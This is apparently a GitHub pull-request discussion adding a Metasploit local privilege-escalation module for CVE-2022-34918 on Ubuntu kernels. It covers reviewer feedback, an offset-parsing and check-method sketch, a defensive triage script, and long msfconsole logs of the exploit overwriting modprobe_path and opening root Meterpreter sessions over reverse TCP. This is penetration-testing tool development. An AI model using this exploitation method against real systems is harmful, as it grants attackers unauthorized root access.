metasploit-framework
Add exploit for CVE-2022-34918
CVE-2022-34918
This is a local-privilege escalation exploit targeting the Netfilter component of the Linux kernel.
CVE details RandoriSec blog post
The vulnerability was discovered, and the initial exploit code was written, by Arthur Mongodin (@Aleknight) during his internship at RandoriSec. I made a few modifications to the PoC code and made a Metasploit module out of it.
The exploit targets Ubuntu. It aims to overwrite the `modprobe_path` variable with a string in `/tmp/`, to create a corresponding temporary file that gives the setuid bit to our payload.
From my testing, it has a pretty good success rate, but the system is not always in a stable state after successful exploitation (kernel panics can occur randomly at any time).
Credits
Thanks to @RandoriSec for supporting this research, and the publication of this exploit code.
Verification
List the steps needed to make sure this thing works
- [ ] Start `msfconsole`
- [ ] Run Ubuntu (Desktop or Server), running a kernel that has offsets in `external/source/exploits/CVE-2022-34918/src/util.c`, `5.15.0-25-generic #25-Ubuntu` for example.
- [ ] Get a session on the target
- [ ] Test this module: `use exploit/linux/local/netfilter_nft_set_elem_init_privesc`
- [ ] Verify the privilege escalation works
Possible improvements
- This exploit leaves a file in `/tmp`, having a non-printable name. The file is created by the exploit binary; not sure if it's a good idea to use `register_file_for_cleanup` for it.
- Compiling on the target would be a good idea, but as I see, the `Msf::Post::Linux::Compile` mixin is mainly a wrapper over gcc. I think it would be a great idea to have a wrapper around `make`, support `clang` perhaps if there is no gcc on the target, and so on. I don't think wrapping the exploit in a single file would be a good idea.
- The exploit writes a file to `/tmp` anyway. `WritableDir` is used for uploading the payload and the exploit, but the exploitation strategy used overwrites bytes from `modprobe_path` with a valid pointer that is also a filename in `/tmp`.
- A check method? Not sure if check should return whether the vulnerability is present, or whether the target is supported (the vulnerability is not specific to Ubuntu, but the exploitation strategy might differ, and the exploit doesn't even have all the offsets for Ubuntu kernel versions).
- More offsets for more Ubuntu kernel versions would be nice (update `external/source/exploits/CVE-2022-34918/src/util.c`). The needed offsets are those of:
  - `io_ring_ctx_ref_free`
  - `io_rsrc_node_ref_zero`
  - `modprobe_path`
Testing tips
- To speed up the exploit upload, you can remove the `-static` flag in the Makefile (this will reduce the file size drastically).
- If it fails a few times, reboot and retry (it relies on heap spraying).
- On successful exploitation, you get a root shell.
Thanks for your pull request! Before this can be merged, we need the following documentation for your module:
> A check method? Not sure if check should return whether the vulnerability is present, or whether the target is supported (The vulnerability is not specific to Ubuntu, but the exploitation strategy might differ, and the exploit doesn't even have all the offsets for Ubuntu kernel versions).

`CheckCode::Appears` is appropriate if the target system is determined to be vulnerable and exploitable using the existing exploit code.
Use `CheckCode::Safe` with an appropriate message if the target system is likely to be vulnerable, but not exploitable using the existing exploit code; i.e., something like: `CheckCode::Safe("Target kernel version #{version} appears vulnerable, but no offsets for this version")`.
See also: https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-write-a-check-method.html
Edit: A quick read through the source shows that at minimum the target kernel must be Ubuntu and unprivileged user namespaces are required. Refer to the following modules which check for these requirements, in addition to checking the kernel version.
> Compiling on the target would be a good idea, but as I see, the `Msf::Post::Linux::Compile` mixin is mainly a wrapper over gcc. I think it would be a great idea to have a wrapper around `make`, support `clang` perhaps if there is no gcc on the target, and so on. I don't think wrapping the exploit in a single file would be a good idea.
You can write the upload and compile code manually. Before this method existed, the same code was copied between a bunch of modules. This method grew natively out of the copypasta. It isn't a rule.
Personally I usually prefer re-writing the exploit to be an all-in-one self-contained C file. This is more convenient and also means that the target host requires only gcc (no `make`). However, that is not always possible, and glancing at the 28 files in the PR it may not be viable here.
> More offsets for more Ubuntu kernel versions would be nice (update external/source/exploits/CVE-2022-34918/src/util.c).

This should keep you entertained for a while. Looks like `io_rsrc_node_ref_zero` was not present before 5.13 Ubuntu kernels.
20.04.4 LTS
Ubuntu 21.10
I added 14 more kernel offsets, and tested a few of these versions, thanks @bcoles. Could you provide a similar list for 22.04 LTS (if you have one of course)? Or instructions on how you compile so many vmlinuz files.
The symbol that isn't present on older kernel versions is used in the KASLR bypass process. I am not sure if a different pointer could end up in the leaked memory; I might investigate it this weekend. It should still work with the `io_ring_ctx_ref_free` offset only, but I expect a lower success rate.
Added a check method also.
I will add the module docs tomorrow.
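As an added example (not code from this PR, and not Metasploit's own `CheckCode` API), the following stand-alone Ruby sketch models the two review points above: it turns `grep` output over `/boot/System.map-*` files, as posted by @bcoles, into the per-kernel offset table the exploit needs, and it implements the check decision @bcoles describes (`Appears` only when offsets for exactly that kernel exist, `Safe` with a message otherwise, after the Ubuntu and unprivileged-user-namespace requirements). The names `CheckResult`, `parse_system_map_grep`, `usable_offsets`, `check_target`, the sample addresses, and the `ASSUMED_VULNERABLE` version range are assumptions made for this sketch.

```ruby
require "rubygems" # Gem::Version; normally loaded already

# Stand-in for Msf::Exploit::CheckCode in this stand-alone sketch (assumed name;
# a real module would return CheckCode::Appears / CheckCode::Safe).
CheckResult = Struct.new(:code, :message) do
  def to_s
    "#{code}: #{message}"
  end
end

# Symbols the PR says util.c needs for each supported kernel.
SYMBOLS_NEEDED = %w[io_ring_ctx_ref_free io_rsrc_node_ref_zero modprobe_path].freeze

# Shape of one line of `grep -H <symbol> /boot/System.map-*` output, e.g.
#   /boot/System.map-5.13.0-25-generic:ffffffff81389270 t io_ring_ctx_ref_free
SYSTEM_MAP_LINE = %r{\A/boot/System\.map-(?<release>\S+?):(?<addr>\h{16})\s+\S\s+(?<sym>\S+)\z}

# Placeholder vulnerable range: an assumption for this sketch, not taken from the
# thread; verify against the advisory before relying on it. Ubuntu releases are
# compared by their base version, e.g. "5.13.0-25-generic" -> 5.13.0.
ASSUMED_VULNERABLE = (Gem::Version.new("5.8")..Gem::Version.new("5.18.9")).freeze

# Turn grep output into { release => { symbol => address } }. Split-off ".cold"
# fragments and unrelated symbols are ignored; malformed lines are skipped.
def parse_system_map_grep(text)
  table = Hash.new { |h, k| h[k] = {} }
  text.each_line do |line|
    m = SYSTEM_MAP_LINE.match(line.strip)
    next unless m && SYMBOLS_NEEDED.include?(m[:sym])
    table[m[:release]][m[:sym]] = m[:addr].to_i(16)
  end
  table
end

# Kernels the exploit can target: modprobe_path and io_ring_ctx_ref_free are
# required; io_rsrc_node_ref_zero only exists from 5.13 on, and the PR author
# expects the exploit to still work (less reliably) without it.
def usable_offsets(table)
  table.select { |_, syms| syms.key?("modprobe_path") && syms.key?("io_ring_ctx_ref_free") }
end

# "5.13.0-25-generic" -> Gem::Version 5.13.0; nil when the string is not a version.
def kernel_base_version(release)
  Gem::Version.new(release.split("-").first)
rescue ArgumentError
  nil
end

# The check decision discussed in review: :appears only when the target is Ubuntu,
# unprivileged user namespaces are enabled, the kernel is in the vulnerable range
# and offsets for exactly this release exist; otherwise :safe with the reason.
def check_target(release:, ubuntu:, userns_clone:, offsets:, vulnerable_range: ASSUMED_VULNERABLE)
  return CheckResult.new(:safe, "Target is not Ubuntu; the exploit offsets are Ubuntu-specific") unless ubuntu
  return CheckResult.new(:safe, "Unprivileged user namespaces are disabled") unless userns_clone
  base = kernel_base_version(release)
  return CheckResult.new(:safe, "Unrecognised kernel release '#{release}'") unless base
  unless vulnerable_range.cover?(base)
    return CheckResult.new(:safe, "Kernel #{release} is outside the assumed vulnerable range")
  end
  if offsets.key?(release)
    CheckResult.new(:appears, "Kernel #{release} is vulnerable and offsets are available")
  else
    CheckResult.new(:safe, "Target kernel version #{release} appears vulnerable, but no offsets for this version")
  end
end

# Constructed sample grep output; the addresses are placeholders, not real offsets.
SAMPLE_MAP = <<~MAP
  /boot/System.map-5.13.0-25-generic:ffffffff81000010 t io_ring_ctx_ref_free
  /boot/System.map-5.13.0-25-generic:ffffffff81000020 t io_rsrc_node_ref_zero
  /boot/System.map-5.13.0-25-generic:ffffffff81c00030 t io_rsrc_node_ref_zero.cold
  /boot/System.map-5.13.0-25-generic:ffffffff82000040 D modprobe_path
  /boot/System.map-5.11.0-41-generic:ffffffff81000050 t io_ring_ctx_ref_free
  /boot/System.map-5.11.0-41-generic:ffffffff82000060 D modprobe_path
  /boot/System.map-5.4.0-26-generic:ffffffff81000070 t io_ring_ctx_ref_free
MAP

if __FILE__ == $PROGRAM_NAME
  offsets = usable_offsets(parse_system_map_grep(SAMPLE_MAP))
  offsets.each { |rel, syms| puts "#{rel}: " + syms.map { |s, a| format("%s=0x%x", s, a) }.join(" ") }
  puts check_target(release: "5.13.0-25-generic", ubuntu: true, userns_clone: true, offsets: offsets)
  puts check_target(release: "5.15.0-41-generic", ubuntu: true, userns_clone: true, offsets: offsets)
end
```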
> Could you provide a similar list for 22.04 LTS (if you have one of course). Or instructions on how you compile so many vmlinuz files.
Ubuntu 22.04 LTS
I added some docs, updated the check method, and added offsets for Ubuntu 22.04 kernels, thanks to @bcoles . I also tested a few kernel versions, seems to work fine, but more testing is necessary.
@bwatters-r7 Any updates on this?
(Should be ready for landing, please let me know if you need help at testing, or if you have more feedback)
@red0xff some minor stuff, but yup, this is on my radar again.
Hey there @red0xff; thanks for addressing the changes! I'm in the middle of something else right now, but I'm hoping to take a look at this again next week.
Also, I'm assuming this is based in large part on https://github.com/randorisec/CVE-2022-34918-LPE-PoC, which is owned by @randorisec. I don't see a license file or license information in any of the files; do we have permission to use the code? Could we work with @randorisec to add a license file that would allow us to use it? I know that @Aleknight was the author, but if they did it while employed by @randorisec, my guess is that the code belongs to them, and the easiest thing would be to put a license file in the original repo that grants us (and/or anyone) permission to use it. Either a BSD-3 or MIT license would work, and I'm happy to work with the original repo owners to get it in place. I'll also tag @jmartin-r7 because while I know theoretically what needs to happen, he's actually done it.
You're right. Yes, you have the permission to use the code. I've added a BSD licence reference on the repo: https://github.com/randorisec/CVE-2022-34918-LPE-PoC#license
Hi there, Is that ok now (regarding the licence) ? Also can we help in anything else ?
@randorisec the updates looks good we can move this PR forward based on that update.
I would recommend extracting and creating a `LICENSE` file so GitHub will recognize it in your repository stats.
Done, I've added `LICENSE.md`.
I was unable to get this to work on `Linux ubuntu-vm 5.11.0-41-generic #45~20.04.1-Ubuntu SMP Wed Nov 10 10:20:10 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux`
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > sessions -i 7
[*] Starting interaction with 7...
meterpreter > sysinfo
Computer : 10.5.134.179
OS : Ubuntu 20.04 (Linux 5.11.0-41-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > shell
Process 2070 created.
Channel 1 created.
u[*] 10.5.134.179 - Meterpreter session 6 closed. Reason: Died
name -a
Linux ubuntu-vm 5.11.0-41-generic #45~20.04.1-Ubuntu SMP Wed Nov 10 10:20:10 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
exit
meterpreter > background
[*] Backgrounding session 7...
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 7
session => 7
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run
[*] Started reverse TCP handler on 10.5.135.101:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/0nd0V' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/7Dcxw' (248 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #2
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/0nd0V: Operation timed out.
^C[-] Failed to delete /tmp/7Dcxw:
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 7 closed. Reason: Died
[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 8 opened (10.5.135.101:4567 -> 10.5.134.179:32974) at 2022-09-06 16:29:50 -0500
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) >
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) >
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 8
session => 8
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run
[*] Started reverse TCP handler on 10.5.135.101:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/gDfRMpTa' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/OEWxBKigGv' (248 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #2
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/gDfRMpTa: Operation timed out.
[-] Failed to delete /tmp/OEWxBKigGv: Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) >
It worked for me on `5.11.0-41-generic`, sure, it doesn't have the best success rate, but it's still decent, and it works.
(If it hangs like that, reboot the VM, get a session again, and test the module again).
(Tested on Ubuntu Server with that kernel version)
After about 10 attempts and 5 reboots, I got a session:
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run
[*] Started reverse TCP handler on 10.5.135.101:4545
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/7MhKy' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/A7FHgU' (304 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[+] Leak succeed
[*] [+] kaslr base found 0xffffffff81200000
[*] [+] physmap base found 0xffff9edf00000000
[*] [+] modprobe_path changed !
[*] [+] Modprobe payload setup
[+] Leak succeed
[*] [+] kaslr base found 0xffffffff81200000
[*] [+] physmap base found 0xffff9edf00000000
[*] [+] modprobe_path changed !
[*] [+] Modprobe payload setup
[*] [?] waitpid
[*] [?] sem_post
[*] [+++] Got root shell, should exit?
[+] A session has been created
[*] Meterpreter session 6 opened (10.5.135.101:4545 -> 10.5.134.179:41252) at 2022-09-08 08:57:01 -0500
[-] Failed to delete /tmp/7MhKy: Operation timed out.
[-] Failed to delete /tmp/A7FHgU: Operation timed out.
meterpreter > sysinfo
Computer : 10.5.134.179
OS : Ubuntu 20.04 (Linux 5.11.0-41-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: root
meterpreter >
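The successful run above shows the traces this module leaves on a host: the kernel build string it detects, the `modprobe_path changed !` step, and the two uploads in `/tmp` that the cleanup could not delete (plus the non-printable-named file mentioned in the PR description). As an added example that is not part of this PR or the module's code, here is a small triage script a defender can run afterwards to check those three things. The kernel build strings are the ones mentioned in this thread; the sample inputs at the bottom are constructed, and `triage_live_host()` assumes a Linux host with readable `/proc` and `/tmp`.

```python
"""Host triage for the artifacts this module leaves behind.

Added example for this PR thread; it is not the module's code nor part of the
exploit. It checks the three traces visible in the run logs: the kernel build
string the exploit reports, the kernel.modprobe sysctl that the exploit
rewrites, and leftover files in /tmp with non-printable names. The sample
inputs at the bottom are constructed for this example.
"""
import os
from typing import Dict, List, Optional

# Kernel build strings mentioned in this PR as tested targets. This is a
# triage hint only: a kernel absent from the list may still be affected.
TESTED_KERNELS = (
    "5.15.0-25-generic #25-Ubuntu",
    "5.11.0-41-generic #45~20.04.1-Ubuntu",
)

EXPECTED_MODPROBE = "/sbin/modprobe"


def modprobe_path_finding(value: str) -> Optional[str]:
    """Describe what is wrong with a kernel.modprobe value, or None if it is sane.

    A successful run ("modprobe_path changed !" in the log) leaves this
    pointing at a file under /tmp whose name is made of raw pointer bytes,
    hence non-printable characters.
    """
    v = value.rstrip("\n")
    if v == EXPECTED_MODPROBE:
        return None
    if not v.startswith("/"):
        return f"modprobe_path is not an absolute path: {v!r}"
    if v.startswith(("/tmp/", "/dev/shm/", "/var/tmp/")):
        return f"modprobe_path points into a world-writable directory: {v!r}"
    if any(not c.isprintable() for c in v):
        return f"modprobe_path contains non-printable characters: {v!r}"
    return f"modprobe_path is not {EXPECTED_MODPROBE}: {v!r}"


def suspicious_tmp_names(names: List[str]) -> List[str]:
    """Return the names that contain control or undecodable characters.

    os.listdir() returns undecodable bytes as lone surrogates, and
    str.isprintable() is False for those as well as for ASCII control chars.
    """
    return [n for n in names if any(not c.isprintable() for c in n)]


def kernel_matches_tested(release: str, version: str) -> bool:
    """True when `uname -r` plus the build tag from `uname -v` match a tested string."""
    parts = version.split()
    build = parts[0] if parts else ""
    return f"{release} {build}" in TESTED_KERNELS


def triage(modprobe_value: str, tmp_names: List[str],
           release: str, version: str) -> Dict[str, object]:
    """Combine the three checks into one findings dictionary."""
    findings: Dict[str, object] = {
        "kernel_tested_in_pr": kernel_matches_tested(release, version),
    }
    problem = modprobe_path_finding(modprobe_value)
    if problem:
        findings["modprobe_path"] = problem
    odd = suspicious_tmp_names(tmp_names)
    if odd:
        findings["tmp_files"] = odd
    return findings


def triage_live_host() -> Dict[str, object]:
    """Run the checks on the local Linux host (needs read access to /proc and /tmp)."""
    with open("/proc/sys/kernel/modprobe", "rb") as f:
        # surrogateescape keeps raw pointer bytes instead of raising on decode
        modprobe = f.read().decode("utf-8", "surrogateescape")
    u = os.uname()
    return triage(modprobe, os.listdir("/tmp"), u.release, u.version)


# Constructed sample of a host after the successful run logged above: the two
# uploads the module failed to delete, plus a file whose name is three raw
# bytes (surrogate-escaped here) that modprobe_path now points at.
SAMPLE_TMP = ["7MhKy", "A7FHgU", "\udcff\udc9e\udc98", "systemd-private-x"]
SAMPLE_MODPROBE = "/tmp/\udcff\udc9e\udc98\n"
SAMPLE_RELEASE = "5.11.0-41-generic"
SAMPLE_VERSION = "#45~20.04.1-Ubuntu SMP Wed Nov 10 10:20:10 UTC 2021"

if __name__ == "__main__":
    for key, val in triage(SAMPLE_MODPROBE, SAMPLE_TMP,
                           SAMPLE_RELEASE, SAMPLE_VERSION).items():
        print(f"{key}: {val!r}")
```

Run it as-is to see the findings for the constructed sample, or call `triage_live_host()` on a suspect machine; a `modprobe_path` finding is the strongest signal, since nothing legitimate moves that sysctl into `/tmp`.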
Hi, is there something else missing? We would love to see this module landed 🤗
I need to get it to work again....
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run
[*] Started reverse TCP handler on 10.5.135.101:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/DRXksAxm9' (765816 bytes) ...
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run
[*] Started reverse TCP handler on 10.5.135.101:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run
[*] Started reverse TCP handler on 10.5.135.101:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) >
[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 4 opened (10.5.135.101:4567 -> 10.5.134.179:58040) at 2022-09-27 15:55:16 -0500
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 4
session => 4
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run
[*] Started reverse TCP handler on 10.5.135.101:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/Qb7pg88i' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/Thi6a' (304 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] 10.5.134.179 - Meterpreter session 5 closed. Reason: Died
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Meterpreter session 5 is not valid and will be closed
[-] Failed to delete /tmp/Qb7pg88i: Operation timed out.
[-] Failed to delete /tmp/Thi6a: Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 4 closed. Reason: Died
[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 6 opened (10.5.135.101:4567 -> 10.5.134.179:34242) at 2022-09-27 15:57:19 -0500
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 6
session => 6
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run
[*] Started reverse TCP handler on 10.5.135.101:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/U2tRChNB' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/WOqouFDu' (304 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #2
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #3
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #4
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #5
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[-] Exploit has failed
[*] Exploit completed, but no session was created.
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 6 closed. Reason: Died
[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 7 opened (10.5.135.101:4567 -> 10.5.134.179:34592) at 2022-09-27 15:59:56 -0500
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 7
session => 7
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run
[*] Started reverse TCP handler on 10.5.135.101:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/5XWtO40CI' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/kBXUCN8Zu' (304 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/5XWtO40CI: Operation timed out.
[-] Failed to delete /tmp/kBXUCN8Zu: Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 2 closed. Reason: Died
[*] 10.5.134.179 - Meterpreter session 7 closed. Reason: Died
[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 8 opened (10.5.135.101:4567 -> 10.5.134.179:43904) at 2022-09-27 16:04:56 -0500
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 8
session => 8
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run
[*] Started reverse TCP handler on 10.5.135.101:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/3AluGYr' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/sUKx6SW7' (304 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] 10.5.134.179 - Meterpreter session 9 closed. Reason: Died
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/3AluGYr: Operation timed out.
[-] Failed to delete /tmp/sUKx6SW7: Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 8 closed. Reason: Died
[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 10 opened (10.5.135.101:4567 -> 10.5.134.179:57210) at 2022-09-27 16:09:14 -0500
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 10
session => 10
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run
[*] Started reverse TCP handler on 10.5.135.101:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/Hf5kkOcpf' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/Hx2Wjrwlr' (304 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/Hf5kkOcpf: Operation timed out.
[*] Meterpreter session 9 opened (10.5.135.101:4444 -> 127.0.0.1) at 2022-09-27 16:10:12 -0500
[-] Failed to delete /tmp/Hx2Wjrwlr: Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 10 closed. Reason: Died
[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 11 opened (10.5.135.101:4567 -> 10.5.134.179:57966) at 2022-09-27 16:11:26 -0500
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 11
session => 11
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run
[*] Started reverse TCP handler on 10.5.135.101:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/8JKI9wK' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/K7eqJ2U' (304 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/8JKI9wK: Operation timed out.
[-] Failed to delete /tmp/K7eqJ2U: Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 11 closed. Reason: Died
[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 12 opened (10.5.135.101:4567 -> 10.5.134.179:50556) at 2022-09-27 16:15:20 -0500
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 12
session => 12
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run
[*] Started reverse TCP handler on 10.5.135.101:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/sEEAde' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/fswYluB' (304 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/sEEAde: Operation timed out.
[-] Failed to delete /tmp/fswYluB: Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set payload linux/x64/meterpreter_reverse_tcp
payload => linux/x64/meterpreter_reverse_tcp
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > show options
Module options (exploit/linux/local/netfilter_nft_set_elem_init_privesc):
Name Current Setting Required Description
---- --------------- -------- -----------
